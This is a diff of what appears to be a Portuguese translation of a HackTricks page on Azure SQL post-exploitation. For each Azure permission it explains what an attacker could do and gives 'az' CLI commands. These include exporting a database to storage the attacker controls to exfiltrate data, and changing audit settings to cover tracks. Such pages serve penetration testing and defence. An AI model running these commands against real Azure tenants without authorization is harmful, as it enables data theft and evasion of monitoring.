Translated ['.github/pull_request_template.md', 'src/pentesting-cloud/az

src/pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md

@@ -4,7 +4,7 @@
 
 ## SQL Database Post Exploitation
 
-For more information about SQL Database check:
+Para mais informações sobre SQL Database, consulte:
 
 {{#ref}}
 ../az-services/az-sql.md
@@ -12,8 +12,7 @@ For more information about SQL Database check:
 
 ### "Microsoft.Sql/servers/databases/read", "Microsoft.Sql/servers/read" && "Microsoft.Sql/servers/databases/write"
 
-With these permissions, an attacker can create and update databases within the compromised environment. This post-exploitation activity could allow an attacker to add malicious data, modify database configurations, or insert backdoors for further persistence, potentially disrupting operations or enabling additional malicious actions.
-
+Com essas permissões, um atacante pode criar e atualizar bancos de dados dentro do ambiente comprometido. Esta atividade de pós-exploração pode permitir que um atacante adicione dados maliciosos, modifique configurações de banco de dados ou insira backdoors para maior persistência, potencialmente interrompendo operações ou permitindo ações maliciosas adicionais.
 ```bash
 # Create Database
 az sql db create --resource-group <resource-group> --server <server-name> --name <new-database-name>
@@ -21,73 +20,63 @@ az sql db create --resource-group <resource-group> --server <server-name> --name
 # Update Database
 az sql db update --resource-group <resource-group> --server <server-name> --name <database-name> --max-size <max-size-in-bytes>
 ```
-
 ### "Microsoft.Sql/servers/elasticPools/write" && "Microsoft.Sql/servers/elasticPools/read"
 
-With these permissions, an attacker can create and update elasticPools within the compromised environment. This post-exploitation activity could allow an attacker to add malicious data, modify database configurations, or insert backdoors for further persistence, potentially disrupting operations or enabling additional malicious actions.
-
+Com essas permissões, um atacante pode criar e atualizar elasticPools dentro do ambiente comprometido. Essa atividade de pós-exploração pode permitir que um atacante adicione dados maliciosos, modifique configurações de banco de dados ou insira backdoors para maior persistência, potencialmente interrompendo operações ou permitindo ações maliciosas adicionais.
 ```bash
 # Create Elastic Pool
 az sql elastic-pool create \
-    --name <new-elastic-pool-name> \
-    --server <server-name> \
-    --resource-group <resource-group> \
-    --edition <edition> \
-    --dtu <dtu-value>
+--name <new-elastic-pool-name> \
+--server <server-name> \
+--resource-group <resource-group> \
+--edition <edition> \
+--dtu <dtu-value>
 
 # Update Elastic Pool
 az sql elastic-pool update \
-    --name <elastic-pool-name> \
-    --server <server-name> \
-    --resource-group <resource-group> \
-    --dtu <new-dtu-value> \
-    --tags <key=value>
+--name <elastic-pool-name> \
+--server <server-name> \
+--resource-group <resource-group> \
+--dtu <new-dtu-value> \
+--tags <key=value>
 ```
-
 ### "Microsoft.Sql/servers/auditingSettings/read" && "Microsoft.Sql/servers/auditingSettings/write"
 
-With this permission, you can modify or enable auditing settings on an Azure SQL Server. This could allow an attacker or authorized user to manipulate audit configurations, potentially covering tracks or redirecting audit logs to a location under their control. This can hinder security monitoring or enable it to keep track of the actions. NOTE: To enable auditing for an Azure SQL Server using Blob Storage, you must attach a storage account where the audit logs can be saved.
-
+Com esta permissão, você pode modificar ou habilitar as configurações de auditoria em um Azure SQL Server. Isso pode permitir que um atacante ou usuário autorizado manipule as configurações de auditoria, potencialmente encobrindo rastros ou redirecionando os logs de auditoria para um local sob seu controle. Isso pode dificultar a monitorização de segurança ou permitir que continue a acompanhar as ações. NOTA: Para habilitar a auditoria para um Azure SQL Server usando Blob Storage, você deve anexar uma conta de armazenamento onde os logs de auditoria podem ser salvos.
 ```bash
 az sql server audit-policy update \
-  --server <server_name> \
-  --resource-group <resource_group_name> \
-  --state Enabled \
-  --storage-account <storage_account_name> \
-  --retention-days 7
+--server <server_name> \
+--resource-group <resource_group_name> \
+--state Enabled \
+--storage-account <storage_account_name> \
+--retention-days 7
 ```
-
 ### "Microsoft.Sql/locations/connectionPoliciesAzureAsyncOperation/read", "Microsoft.Sql/servers/connectionPolicies/read" && "Microsoft.Sql/servers/connectionPolicies/write"
 
-With this permission, you can modify the connection policies of an Azure SQL Server. This capability can be exploited to enable or change server-level connection settings
-
+Com esta permissão, você pode modificar as políticas de conexão de um Azure SQL Server. Essa capacidade pode ser explorada para habilitar ou alterar as configurações de conexão em nível de servidor.
 ```bash
 az sql server connection-policy update \
-  --server <server_name> \
-  --resource-group <resource_group_name> \
-  --connection-type <Proxy|Redirect|Default>
+--server <server_name> \
+--resource-group <resource_group_name> \
+--connection-type <Proxy|Redirect|Default>
 ```
-
 ### "Microsoft.Sql/servers/databases/export/action"
 
-With this permission, you can export a database from an Azure SQL Server to a storage account. An attacker or authorized user with this permission can exfiltrate sensitive data from the database by exporting it to a location they control, posing a significant data breach risk. It is important to know the storage key to be able to perform this.
-
+Com esta permissão, você pode exportar um banco de dados de um Azure SQL Server para uma conta de armazenamento. Um atacante ou usuário autorizado com essa permissão pode exfiltrar dados sensíveis do banco de dados exportando-o para um local que eles controlam, representando um risco significativo de violação de dados. É importante conhecer a chave de armazenamento para poder realizar isso.
 ```bash
 az sql db export \
-  --server <server_name> \
-  --resource-group <resource_group_name> \
-  --name <database_name> \
-  --storage-uri <storage_blob_uri> \
-  --storage-key-type SharedAccessKey \
-  --admin-user <admin_username> \
-  --admin-password <admin_password>
+--server <server_name> \
+--resource-group <resource_group_name> \
+--name <database_name> \
+--storage-uri <storage_blob_uri> \
+--storage-key-type SharedAccessKey \
+--admin-user <admin_username> \
+--admin-password <admin_password>
 
 ```
-
 ### "Microsoft.Sql/servers/databases/import/action"
 
-With this permission, you can import a database into an Azure SQL Server. An attacker or authorized user with this permission can potentially upload malicious or manipulated databases. This can lead to gaining control over sensitive data or by embedding harmful scripts or triggers within the imported database. Additionaly you can import it to your own server in azure. Note: The server must allow Azure services and resources to access the server.
-
+Com esta permissão, você pode importar um banco de dados para um Azure SQL Server. Um atacante ou usuário autorizado com essa permissão pode potencialmente fazer upload de bancos de dados maliciosos ou manipulados. Isso pode levar ao controle sobre dados sensíveis ou à incorporação de scripts ou gatilhos prejudiciais dentro do banco de dados importado. Além disso, você pode importá-lo para seu próprio servidor no Azure. Nota: O servidor deve permitir que serviços e recursos do Azure acessem o servidor.
 ```bash
 az sql db import --admin-user <admin-user> \
 --admin-password <admin-password> \
@@ -98,9 +87,4 @@ az sql db import --admin-user <admin-user> \
 --storage-key <storage-account-key> \
 --storage-uri "https://<storage-account-name>.blob.core.windows.net/bacpac-container/MyDatabase.bacpac"
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-